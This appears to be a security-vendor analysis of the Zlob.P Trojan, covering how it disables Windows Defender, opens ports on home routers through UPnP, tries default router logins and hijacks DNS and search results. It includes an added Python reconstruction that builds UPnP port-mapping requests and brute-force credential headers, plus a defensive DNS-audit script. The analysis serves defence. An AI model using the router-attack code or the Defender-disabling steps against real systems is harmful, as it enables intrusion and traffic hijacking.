Zlob.P – DNS Poisoning at Home
We have seen several threats that alter DNS settings in the past; however, this Zlob variant does more than change DNS settings. It takes advantage of popular search engines and makes money for its operators through ads and affiliate links. In this reincarnation, Zlob has three effective states. The first is installation: the Trojan infects the computer and installs itself, deriving its file and service names from a cyclic redundancy check (CRC) of the date Windows was installed. The second discovers the network topology and reconfigures settings; if the router is reachable, it will even attempt to log in to it. The third deals with browser traffic: the Trojan performs a man-in-the-middle attack and changes what the user sees and clicks on accordingly. We will take a look under the hood and analyze each of these states more closely.
State I: Installation
In order to ensure that Trojan.Zlob.P has a unique name on every computer it infects, it uses the Windows installation date to calculate a name for itself. Specifically, Trojan.Zlob.P calculates the CRC of the installation date and uses that value as the name of the executable it copies itself to, as the name of a newly created service, and as part of its own unique ID. This variant reads the Windows installation date from the registry location shown in the following image:
If the registry key is not accessible for any reason, a default name is used instead. If Windows Vista, Windows 7, or Windows Server 2008 is found running, it stops the WinDefend service (Windows Defender, which protects the computer from spyware), terminates the associated process, MSASCui.exe, and sets the DisableAntiSpyware value under HKLM\Software\Policies\Microsoft\Windows Defender so that Defender stays disabled.
Upon reaching this point, the Trojan will then copy itself to the system directory under a different name. For default Windows XP installations this amounts to “C:\Windows\System32\[calculated CRC string].exe.” The next step for the Trojan is to create a service with the following characteristics:
Startup Type: Automatic
Image Path: %System%\%crc%.exe
Display Name: MSWU-%crc%
In this variant the only thing that is consistent is the service display name containing the string “MSWU-“. Everything else depends on properties such as the location of the system directory and the installation date.
State II: Network Discovery and Router attack
This brings us to the second state, in which DNS shenanigans make things even more interesting. The malware prepares its network connections and “phones home,” so to speak. This variant uses the Simple Service Discovery Protocol (SSDP) to discover Universal Plug and Play (UPnP) devices on the local network.
In this case, Zlob.P is interested in router information. It uses Simple Object Access Protocol (SOAP) requests to glean details from the router, such as its external IP address, manufacturer, model name and model number, as well as the control URL of the UPnP device (the endpoint to which subsequent SOAP actions are posted).
Now that the preliminaries are out of the way, the Trojan can continue its dirty work. It will try to reach the administrative interface of the router by attempting to connect to the following pages:
Upon a successful connection, Zlob.P will issue a SOAP request to try and punch a hole in the router’s configuration by opening a port:
Bear in mind that all of this assumes the administrative panel of the router is not password protected. But what if the router does require a login? It turns out that Trojan.Zlob.P is prepared for this as well. The threat uses Internet Explorer and explorer.exe to communicate with the router over HTTP Basic authentication, connecting to the router and attempting to log in with the following combinations:
Usernames: admin, <blank>, root, Admin, 1234
Passwords: [long list of default manufacturers’ passwords]
If these attempts fail, then the Trojan has one last login trick up its sleeve. It will bank on the user being lazy and storing the passwords to avoid manually typing in the login information every time. Zlob.P will access stored Internet Explorer credentials and attempt to log in using whatever it finds.
The threat then checks whether it succeeded in opening a port on the router and reports the result to the attacker, sending the string “upnperror” if something failed. With the newly opened port mapping in place, a backdoor into the internal network exists, and the attacker can connect through it. The reported data is Base64-encoded (not encrypted; Base64 is trivially reversible) before being sent off to the attacker. For a list of domains and IP addresses, please see Appendix A.
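To make the router attack concrete, here is the exchange described above reconstructed in Python: the SSDP M-SEARCH, parsing of the reply's LOCATION header, extraction of the WANIPConnection control URL from the device description, the SOAP GetExternalIPAddress and AddPortMapping (“punch a hole”) actions, and the HTTP Basic credentials the login attempts use. This is an added example, not Zlob.P's code or Symantec's; the router replies are constructed samples, and the 192.168.1.1 router, the port numbers and the mapping description are assumptions. Defenders can use the same parser to audit what their own router exposes.

```python
"""Added example: the UPnP exchange described above (SSDP discovery,
device-description lookup, SOAP GetExternalIPAddress/AddPortMapping, then
HTTP Basic credentials), driven by constructed sample replies so it runs
offline. Not Zlob.P's code; the sample router and port numbers are assumptions."""
import base64
import xml.etree.ElementTree as ET
from urllib.parse import urljoin

SSDP_GROUP = "239.255.255.250:1900"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
DEVICE_NS = {"u": "urn:schemas-upnp-org:device-1-0"}


def ssdp_msearch(st="upnp:rootdevice", mx=2):
    """Build the M-SEARCH datagram a client multicasts to 239.255.255.250:1900."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        f"HOST: {SSDP_GROUP}\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {st}\r\n\r\n"
    ).encode()


def parse_ssdp_response(raw):
    """Turn a unicast SSDP reply into a dict of lower-cased headers;
    LOCATION is the URL of the device description XML."""
    lines = raw.decode(errors="replace").split("\r\n")
    if not lines[0].startswith("HTTP/1.1 200"):
        raise ValueError("not an SSDP 200 OK response")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return headers


def parse_device_description(xml_text, location):
    """Extract manufacturer/model fields and the absolute controlURL of the
    WANIPConnection service from the device description document."""
    root = ET.fromstring(xml_text)
    info = {tag: root.findtext(f".//u:{tag}", namespaces=DEVICE_NS)
            for tag in ("manufacturer", "modelName", "modelNumber")}
    for svc in root.iter(f"{{{DEVICE_NS['u']}}}service"):
        if svc.findtext("u:serviceType", namespaces=DEVICE_NS) == WANIP:
            rel = svc.findtext("u:controlURL", namespaces=DEVICE_NS)
            info["controlURL"] = urljoin(location, rel)  # relative to LOCATION
    return info


def soap_request(action, args):
    """Return (headers, body) for a WANIPConnection SOAP action; the caller
    POSTs the body to the controlURL."""
    arg_xml = "".join(f"<{k}>{v}</{k}>" for k, v in args.items())
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{WANIP}">{arg_xml}</u:{action}></s:Body>'
        "</s:Envelope>"
    )
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": f'"{WANIP}#{action}"'}
    return headers, body


def get_external_ip():
    return soap_request("GetExternalIPAddress", {})


def add_port_mapping(ext_port, internal_ip, int_port, proto="TCP",
                     description="example"):
    """The 'punch a hole' call: map WAN ext_port to internal_ip:int_port.
    Argument order follows the UPnP IGD definition of AddPortMapping."""
    return soap_request("AddPortMapping", {
        "NewRemoteHost": "", "NewExternalPort": ext_port, "NewProtocol": proto,
        "NewInternalPort": int_port, "NewInternalClient": internal_ip,
        "NewEnabled": 1, "NewPortMappingDescription": description,
        "NewLeaseDuration": 0,
    })


def basic_auth_header(user, password):
    """HTTP Basic credentials in the form a router admin page expects."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def credential_attempts(users, passwords):
    """Every username x password pair, in list order (the brute-force loop)."""
    return [(u, p, basic_auth_header(u, p)) for u in users for p in passwords]


# Constructed sample replies standing in for a real router (not from the page).
SAMPLE_SSDP_REPLY = (
    b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=120\r\n"
    b"LOCATION: http://192.168.1.1:49152/rootDesc.xml\r\n"
    b"ST: upnp:rootdevice\r\nUSN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n\r\n"
)
SAMPLE_DESCRIPTION = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
 <device><manufacturer>ExampleCo</manufacturer><modelName>HomeRouter</modelName>
  <modelNumber>HR-1</modelNumber><deviceList><device><serviceList><service>
   <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
   <controlURL>/ctl/IPConn</controlURL></service></serviceList></device>
  </deviceList></device></root>"""


def discover_from_samples():
    """Run the discovery half of the exchange over the constructed replies."""
    headers = parse_ssdp_response(SAMPLE_SSDP_REPLY)
    return parse_device_description(SAMPLE_DESCRIPTION, headers["location"])


if __name__ == "__main__":
    info = discover_from_samples()
    print(info)
    hdrs, body = add_port_mapping(5555, "192.168.1.23", 5555)
    print(hdrs["SOAPAction"], body, sep="\n")
    print(credential_attempts(["admin", ""], ["admin", "1234"])[1])
```

The defensive takeaway is that AddPortMapping requires no authentication at all on most home routers, which is why the credential list is only a fallback for the admin page; disabling UPnP on the WAN side, or at least reviewing the router's current mappings, removes the backdoor path entirely.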
Now comes more network trouble. Zlob.P will attempt to change your network settings to point to a DNS server under the control of the attacker:
Take a look at the two DNS server addresses. Most users do not know what these mean and will assume they are correct because the Internet still works as normal. However, every DNS query now goes through the attacker, creating a man-in-the-middle scenario without the user ever knowing about it. And fixing the setting on the PC may not be enough: if the Trojan succeeded earlier, the router's own settings may have been reconfigured as well, so the router's DNS configuration needs checking too.
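As an added check (not part of the original post), the following Python script parses the output of `ipconfig /all` and flags any configured DNS server that is neither inside the adapter's own subnet nor on an allow-list of resolvers you expect; on a home network that is normally just the router's LAN address. The ipconfig text is a constructed sample, and the 203.0.113.x resolvers are documentation addresses standing in for an attacker's servers, not the addresses the page shows. Run it on real output (`ipconfig /all > out.txt`, then pass the file) as the kind of monitoring the post recommends; the same values also live in the NameServer entries under HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, which is where a DNS changer writes them.

```python
"""Added example (not from the original post): parse `ipconfig /all` output
and flag DNS resolvers a home PC should not normally be using."""
import ipaddress
import re

# Constructed sample output; the 203.0.113.x resolvers are placeholders.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

   Host Name . . . . . . . . . . . . : HOMEPC

Ethernet adapter Local Area Connection:

   DHCP Enabled. . . . . . . . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.1.23(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
   DHCP Server . . . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 203.0.113.10
                                       203.0.113.11

Wireless LAN adapter Wireless Network Connection:

   DHCP Enabled. . . . . . . . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.1.40(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 192.168.1.1
"""

ADAPTER = re.compile(r"^(?P<name>\S.*):$")          # unindented, ends with ':'
KEY_VALUE = re.compile(r"^\s{1,10}(?P<key>[A-Za-z0-9][A-Za-z0-9 -]*?)[ .]*: ?(?P<val>.*)$")
CONTINUATION = re.compile(r"^\s{20,}(?P<val>\S.*)$")  # extra values, deeply indented


def parse_ipconfig(text):
    """Return {adapter name: {field: [values...]}}; multi-line fields such as
    'DNS Servers' keep every continuation line."""
    adapters, current, last_key = {}, None, None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = ADAPTER.match(line)
        if m:
            current, last_key = m.group("name"), None
            adapters[current] = {}
            continue
        if current is None:          # global header before the first adapter
            continue
        m = CONTINUATION.match(line)
        if m and last_key:
            adapters[current][last_key].append(m.group("val").strip())
            continue
        m = KEY_VALUE.match(line)
        if m:
            last_key = m.group("key").strip()
            adapters[current].setdefault(last_key, []).append(m.group("val").strip())
    return adapters


def audit_dns(adapters, allowed_resolvers=()):
    """Flag each DNS server that is outside the adapter's own subnet and not
    on the allow-list. Returns a list of (adapter, server, reason)."""
    allowed = {ipaddress.ip_address(a) for a in allowed_resolvers}
    findings = []
    for name, fields in adapters.items():
        addr = re.sub(r"\(.*?\)", "", fields.get("IPv4 Address", [""])[0]).strip()
        mask = fields.get("Subnet Mask", [""])[0]
        try:
            lan = ipaddress.ip_network(f"{addr}/{mask}", strict=False)
        except ValueError:
            lan = None               # adapter has no IPv4 address; still check
        for dns in fields.get("DNS Servers", []):
            try:
                ip = ipaddress.ip_address(dns)
            except ValueError:
                continue             # e.g. IPv6 link-local with a zone id
            if ip in allowed or (lan is not None and ip in lan):
                continue
            findings.append((name, dns, f"not in {lan} and not an allowed resolver"))
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_IPCONFIG
    for adapter, server, why in audit_dns(parse_ipconfig(text)):
        print(f"SUSPECT {adapter}: DNS server {server} ({why})")
```

If your ISP or employer hands out public resolvers by DHCP, pass them in `allowed_resolvers` so only unexpected addresses are reported; the subnet rule alone is tuned for the home case where the router answers DNS.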
As a result of the attacker taking control of the infected user’s DNS settings, certain sites are no longer reachable, such as paretologic.com, a Microsoft certified partner. Another site that becomes inaccessible is eset.com, makers of Nod32 Antivirus and other anti-malware products. Curiously, one.com, a European web-hosting service established in Denmark, is also affected: after infection, one.com sometimes resolves to an IP address in China associated with malware distribution.
Other sites sharing a theme are affected too, notably personals and dating sites. Some still resolve to the genuine site, while others are redirected to search engines such as Google or Bing. In either case, the traffic can still be monitored. Some of the more popular sites affected are passion.com, penthouse.com, friendfinder.com, and outpersonals.com. Appendix B contains more such sites whose DNS answers have been changed. (The list is by no means complete.)
These sites point to an IP address of 18.104.22.168 (belonging to Keymachine.de), which has been associated with a referral spam bot network based in Germany, according to some authors. Their previous work includes directing traffic to affiliated porn and online drug store websites.
The malicious DNS addresses themselves belong to the UkrTeleGroup, a.k.a. Cernel. They have been linked with the Russian Business Network (RBN) and have provided Web-hosting services for cyber criminals in the past; they were associated with the Atrivo/Intercage reports from a couple of years ago, for instance.
In this variant, the more popular sites that Keymachine.de focused on were primarily dating sites. In contrast, the iNeting.net/Internet Path group did not have a clear focus. Many of the domains that iNeting.net is targeting are varied in nature. As expected, some porn sites have had their DNS records changed; however, other trendy sites such as boxtorrents.com and failblog.com have also been affected. In addition, this variant will try to capture mistyped URIs as well, such as facebbock.com, imbd.com, blospot.com, and yotube.com. Once the typo occurs, the user may either be redirected to a page with ads or continue on to the main site. It is unclear whether the real site is being sent through or if it has been modified in any way. For a partial list of domains that have been affected, please see Appendix C.
While the first state focused on installation and infecting the computer, the second state concentrated more on network functionality. It will sit between the user and the Internet as well as create a possible entry into the internal network by opening a port on the router. It will also change access to certain domains.
State III: Browser tricks
This is the stage where Zlob.P will monitor what is going on with the Web browser (specifically, Internet Explorer, Firefox, or Safari). It will monitor the following search engine sites that the user might visit:
Take a look at the bottom of the screenshot. When we hover the mouse over the link to Blossoms, we can see that it is being redirected to results5.google.com, which, incidentally, is one of the poisoned DNS entries being sent to the user. It is being served from 22.214.171.124, which is another IP address owned by iNeting.net/Internet Path. Once the user clicks on the link, the page is redirected to (in this example) search5.info.com, and not the Blossoms page clicked on earlier.
Clicking on the top link redirects the user to s.info.com, then to googleadservices.com, and then finally to OrientalTrading.com. The Blossoms link has effectively been pushed away.
One last curiosity with browser functionality involves the word “directory.” For example, trying to go to edirectory.com through the address bar redirects the user to bing.com, with edirectory.com as the top result. One would assume then, that the user would click on this link to get to the site. However, the user will actually be redirected to another site such as juggle.com, an encyclopedia and reference resource site.
While older versions of Zlob concentrated on stealing banking information, this variant combines several threats into one: it has Backdoor.Trojan and Trojan.Adclicker functionality and is also a DNS changer aimed at the home user. And it does so in a way that lets it remain stealthy. Even if Zlob.P is detected and deleted, the rogue DNS server setting can remain in place, possibly until the network settings are corrected by hand or the machine moves to another network, and the same applies to any settings changed on the router. Because the attacker sits in the middle of the user’s web traffic, browser exploits and other malicious software can be delivered to the user at any time.
Symantec highly recommends that users stay diligent and monitor their network settings.
Note: Thanks to Liam OMurchu for help during the investigation of this threat.
Appendix A: Partial list of domains and IP addresses used to gather stolen data
Appendix B: Partial list of personals and dating sites
Appendix C: Partial list of sites changed by iNeting.net/Internet Path